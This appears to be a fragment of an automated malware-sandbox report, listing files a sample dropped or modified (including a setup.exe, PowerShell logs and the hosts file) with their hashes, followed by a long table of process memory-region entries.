MD56bfb0d56a3d08f929a939f3f12704f2f
SHA1051f687e8bf80f12edca2ad99381e78a8448c713
SHA2563f157d38f175529138a54555ba6078c67837b87da8452fd55011f82aeb637dfb
SHA512db765b15d6304b7005e04622dfb4c5363064aaf945700cf26a467725b7e3f554e098953932d02fb46620fb3d5346d2dd08aaf2e3dec6a31fe079f785378ec711
-
C:\Windows\Temp\setup.exeFilesize
8.2MB
MD56bfb0d56a3d08f929a939f3f12704f2f
SHA1051f687e8bf80f12edca2ad99381e78a8448c713
SHA2563f157d38f175529138a54555ba6078c67837b87da8452fd55011f82aeb637dfb
SHA512db765b15d6304b7005e04622dfb4c5363064aaf945700cf26a467725b7e3f554e098953932d02fb46620fb3d5346d2dd08aaf2e3dec6a31fe079f785378ec711
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD517286868c0a043ae5d2ff5798b6a3163
SHA1b83b23cd57c7fb2c937f5bc18aeb7ddc955b5401
SHA25640321e18ed0b9eb7e3bc937d3e207ea2039ff45267483ddb4a51f7974475dac6
SHA512e15c11982c0569a389a7dbd0889edd1ef9a8ffb21c0e8ffadebc10e1353f4485524b18ca8e041c66c98d05fb984544da122755e6c2a25728453aeaf4175bdee1
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5d0bcbadb3ebcd041605f37019119c0b6
SHA136b16a2b0e025d40ec5a783cf78ad2ff7c38f288
SHA25620e15db7d6cf2bca7a2922cc9c4939e643b82beb7378adab586910ceed994a8b
SHA512f4fc3762d7d6ffbe10838458d13d6ff3aaa5fdc18e72ecd30697c76c83733d526eb868aa014e404861a6bf8b6881e3cda232f84444b5ba354a390fd87ea3f43a
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD5c5227366b7a688ff23b01788718251aa
SHA19795262e79c832ba49c744fcd1b1794c0ffb5c6a
SHA256789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48
SHA5128b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe
-
memory/752-227-0x00007FF8D3620000-0x00007FF8D37FB000-memory.dmpFilesize
1.9MB
-
memory/752-196-0x00007FF6E8D90000-0x00007FF6E9CC6000-memory.dmpFilesize
15.2MB
-
memory/752-391-0x00007FF6E8D90000-0x00007FF6E9CC6000-memory.dmpFilesize
15.2MB
-
memory/752-321-0x00007FF8D3620000-0x00007FF8D37FB000-memory.dmpFilesize
1.9MB
-
memory/752-320-0x00007FF6E8D90000-0x00007FF6E9CC6000-memory.dmpFilesize
15.2MB
-
memory/752-183-0x0000000000000000-mapping.dmp
-
memory/752-214-0x00007FF6E8D90000-0x00007FF6E9CC6000-memory.dmpFilesize
15.2MB
-
memory/752-584-0x0000000000000000-mapping.dmp
-
memory/752-392-0x00007FF8D3620000-0x00007FF8D37FB000-memory.dmpFilesize
1.9MB
-
memory/752-223-0x00007FF6E8D90000-0x00007FF6E9CC6000-memory.dmpFilesize
15.2MB
-
memory/1420-595-0x0000000000000000-mapping.dmp
-
memory/1780-239-0x0000000000000000-mapping.dmp
-
memory/1780-254-0x000001E91FB40000-0x000001E91FB62000-memory.dmpFilesize
136KB
-
memory/1780-258-0x000001E91FE50000-0x000001E91FEC6000-memory.dmpFilesize
472KB
-
memory/2020-186-0x0000000000000000-mapping.dmp
-
memory/2268-187-0x0000000000000000-mapping.dmp
-
memory/2276-583-0x0000000000000000-mapping.dmp
-
memory/2664-559-0x0000000000000000-mapping.dmp
-
memory/3036-160-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-130-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-150-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-151-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-152-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-153-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-154-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-156-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-155-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-157-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-158-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-159-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-119-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-161-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-162-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-163-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-164-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-165-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-166-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-168-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-170-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-169-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-167-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-171-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-172-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-173-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-174-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-175-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-176-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-177-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-178-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-180-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-179-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-181-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-182-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-147-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-148-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-146-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-145-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-144-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-143-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-142-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-141-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-140-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-139-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-138-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-136-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-137-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-135-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-134-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-133-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-120-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-121-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-122-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-123-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-149-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-124-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-125-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-126-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-127-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-128-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-129-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-131-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3036-132-0x0000000077440000-0x00000000775CE000-memory.dmpFilesize
1.6MB
-
memory/3108-597-0x0000000000000000-mapping.dmp
-
memory/3332-561-0x0000000000000000-mapping.dmp
-
memory/3928-599-0x0000000000000000-mapping.dmp
-
memory/3936-586-0x0000000000000000-mapping.dmp
-
memory/3988-601-0x0000000000000000-mapping.dmp
-
memory/4068-570-0x0000000000000000-mapping.dmp
-
memory/4124-432-0x00000202FBF00000-0x00000202FBF1C000-memory.dmpFilesize
112KB
-
memory/4124-471-0x00000202FBF20000-0x00000202FBF2A000-memory.dmpFilesize
40KB
-
memory/4124-415-0x0000000000000000-mapping.dmp
-
memory/4124-438-0x00000202FC0D0000-0x00000202FC189000-memory.dmpFilesize
740KB
-
memory/4180-367-0x0000000000000000-mapping.dmp
-
memory/4232-368-0x0000000000000000-mapping.dmp
-
memory/4268-369-0x0000000000000000-mapping.dmp
-
memory/4388-560-0x0000000000000000-mapping.dmp
-
memory/4396-370-0x0000000000000000-mapping.dmp
-
memory/4444-371-0x0000000000000000-mapping.dmp
-
memory/4464-576-0x0000000000000000-mapping.dmp
-
memory/4464-322-0x0000000000000000-mapping.dmp
-
memory/4480-603-0x0000000000000000-mapping.dmp
-
memory/4496-574-0x0000000000000000-mapping.dmp
-
memory/4500-323-0x0000000000000000-mapping.dmp
-
memory/4552-596-0x0000000000000000-mapping.dmp
-
memory/4556-324-0x0000000000000000-mapping.dmp
-
memory/4560-374-0x0000000000000000-mapping.dmp
-
memory/4564-563-0x0000000000000000-mapping.dmp
-
memory/4580-325-0x0000000000000000-mapping.dmp
-
memory/4592-377-0x0000000000000000-mapping.dmp
-
memory/4600-326-0x0000000000000000-mapping.dmp
-
memory/4608-379-0x0000000000000000-mapping.dmp
-
memory/4612-378-0x0000000000000000-mapping.dmp
-
memory/4616-327-0x0000000000000000-mapping.dmp
-
memory/4632-564-0x0000000000000000-mapping.dmp
-
memory/4632-328-0x0000000000000000-mapping.dmp
-
memory/4644-380-0x0000000000000000-mapping.dmp
-
memory/4648-329-0x0000000000000000-mapping.dmp
-
memory/4708-330-0x0000000000000000-mapping.dmp
-
memory/4708-385-0x0000000000000000-mapping.dmp
-
memory/4712-567-0x0000000000000000-mapping.dmp
-
memory/4736-566-0x0000000000000000-mapping.dmp
-
memory/4744-565-0x0000000000000000-mapping.dmp
-
memory/4748-331-0x0000000000000000-mapping.dmp
-
memory/4752-569-0x0000000000000000-mapping.dmp
-
memory/4776-568-0x0000000000000000-mapping.dmp
-
memory/4780-332-0x0000000000000000-mapping.dmp
-
memory/4788-594-0x0000000000000000-mapping.dmp
-
memory/4792-604-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/4792-590-0x000000014036EAC4-mapping.dmp
-
memory/4792-605-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/4800-333-0x0000000000000000-mapping.dmp
-
memory/4824-334-0x0000000000000000-mapping.dmp
-
memory/4828-409-0x00007FF7B3270000-0x00007FF7B41A6000-memory.dmpFilesize
15.2MB
-
memory/4828-410-0x00007FF7B3270000-0x00007FF7B41A6000-memory.dmpFilesize
15.2MB
-
memory/4828-558-0x00007FF8D3620000-0x00007FF8D37FB000-memory.dmpFilesize
1.9MB
-
memory/4828-572-0x0000000002570000-0x0000000002576000-memory.dmpFilesize
24KB
-
memory/4828-414-0x00007FF7B3270000-0x00007FF7B41A6000-memory.dmpFilesize
15.2MB
-
memory/4828-413-0x00007FF7B3270000-0x00007FF7B41A6000-memory.dmpFilesize
15.2MB
-
memory/4828-412-0x00007FF8D3620000-0x00007FF8D37FB000-memory.dmpFilesize
1.9MB
-
memory/4828-600-0x00007FF8D3620000-0x00007FF8D37FB000-memory.dmpFilesize
1.9MB
-
memory/4828-406-0x0000000000000000-mapping.dmp
-
memory/4828-575-0x0000000002650000-0x0000000002662000-memory.dmpFilesize
72KB
-
memory/4828-598-0x00007FF7B3270000-0x00007FF7B41A6000-memory.dmpFilesize
15.2MB
-
memory/4836-588-0x0000000000000000-mapping.dmp
-
memory/4844-335-0x0000000000000000-mapping.dmp
-
memory/4864-336-0x0000000000000000-mapping.dmp
-
memory/4876-602-0x0000000000000000-mapping.dmp
-
memory/4880-337-0x0000000000000000-mapping.dmp
-
memory/4904-338-0x0000000000000000-mapping.dmp
-
memory/4924-339-0x0000000000000000-mapping.dmp
-
memory/4972-340-0x0000000000000000-mapping.dmp
-
memory/5024-573-0x0000000000000000-mapping.dmp
-
memory/5040-571-0x0000000000000000-mapping.dmp
-
memory/5076-587-0x000002B68A770000-0x000002B68A777000-memory.dmpFilesize
28KB
-
memory/5076-581-0x000002B68AE90000-0x000002B68AE96000-memory.dmpFilesize
24KB